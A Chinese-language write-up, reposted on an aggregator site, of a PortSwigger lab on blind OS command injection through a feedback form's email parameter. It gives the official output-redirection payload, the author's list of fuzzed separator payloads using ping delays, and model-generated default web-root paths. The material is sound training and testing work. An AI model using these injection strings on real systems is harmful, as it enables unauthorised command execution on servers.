PortsWiggerLab: Blind OS command injection with output redirection

實驗目的

This lab contains a blind OS command injection vulnerability in the feedback function.
The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response. However, you can use output redirection to capture the output from the command. There is a writable folder at:
/var/www/images/
The application serves the images for the product catalog from this location. You can redirect the output from the injected command to a file in this folder, and then use the image loading URL to retrieve the contents of the file.
To solve the lab, execute the whoami command and retrieve the output.

官方WP

Use Burp Suite to intercept and modify the request that submits feedback.
Modify the email parameter, changing it to:
email=||whoami>/var/www/images/output.txt||
Now use Burp Suite to intercept and modify the request that loads an image of a product.
Modify the filename parameter, changing the value to the name of the file you specified for the output of the injected command:
filename=output.txt
Observe that the response contains the output from the injected command.

實驗步驟

進入實驗室，點擊右上角的`Submit feedback`

在反饋表中填入相關信息

使用Yakit進行抓包

針對email參數進行RCE命令注入FUZZ

將請求id從小到大排序，觀察延遲突然變大的請求

由上圖可見，從第8個請求到第9個請求延遲增長跨度大，因此該Payload很可能為有效RCE的間隔符

提取出疑似有效Payload

email=test%40test.com%0Aping+-c+5+127.0.0.1;
email=test%40test.com;ping+-c+5+127.0.0.1;
email=test%40test.com|ping+-c+5+127.0.0.1;
email=test%40test.com;ping+-c+5+127.0.0.1||
email=test%40test.com||ping+-c+5+127.0.0.1||
email=test%40test.com||ping+-c+5+127.0.0.1|
email=test%40test.com;ping+-c+5+127.0.0.1%0A
email=test%40test.com||ping+-c+5+127.0.0.1%0A

單獨取出Payload進行測試可見email參數處確實存在RCE漏洞

嘗試直接執行whoami發現無回顯

嘗試RCE直接通過DNSLOG外帶發現不出網，那就嘗試RCE寫文件。接下來需要針對Apache、Nginx、IIS等常見Web服務器類型進行不同路徑的寫入嘗試

一、Apache HTTP Server
1.?Linux/macOS
默認網站目錄：
Ubuntu/Debian：/var/www/html
CentOS/RHEL：/var/www/html
macOS：/usr/local/var/www
配置文件：
Ubuntu/Debian：/etc/apache2/apache2.conf
CentOS/RHEL：/etc/httpd/conf/httpd.conf
macOS：/usr/local/etc/apache2/2.4/httpd.conf
2.?Windows
默認網站目錄：C:\Apache24\htdocs
配置文件：C:\Apache24\conf\httpd.conf
二、Nginx
1.?Linux/macOS
默認網站目錄：
Ubuntu/Debian：/var/www/html
CentOS/RHEL：/usr/share/nginx/html
macOS：/usr/local/var/www
配置文件：
Ubuntu/Debian：/etc/nginx/sites-available/default
CentOS/RHEL：/etc/nginx/conf.d/default.conf
macOS：/usr/local/etc/nginx/nginx.conf
2.?Windows
默認網站目錄：C:\nginx\html
配置文件：C:\nginx\conf\nginx.conf
三、IIS（Internet Information Services）
Windows（所有版本）
默認網站目錄：C:\inetpub\wwwroot
配置文件：
IIS 7+：%WINDIR%\System32\inetsrv\config\applicationHost.config
管理工具：通過 “Internet Information Services (IIS) 管理器” 圖形界面修改
PS：以上信息由大模型直接生成

觀察到實驗室主頁存在大量圖片，嘗試直接查找這些圖片URL

使用新建標簽頁打開任意圖片

嘗試直接構造命令將文件寫入`/var/www/images`目錄中

嘗試直接訪問test.txt文件發現成功寫入

嘗試直接讀取當前用戶名

完成該實驗

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/bicheng/88579.shtml
繁體地址，請注明出處：http://hk.pswp.cn/bicheng/88579.shtml
英文地址，請注明出處：http://en.pswp.cn/bicheng/88579.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！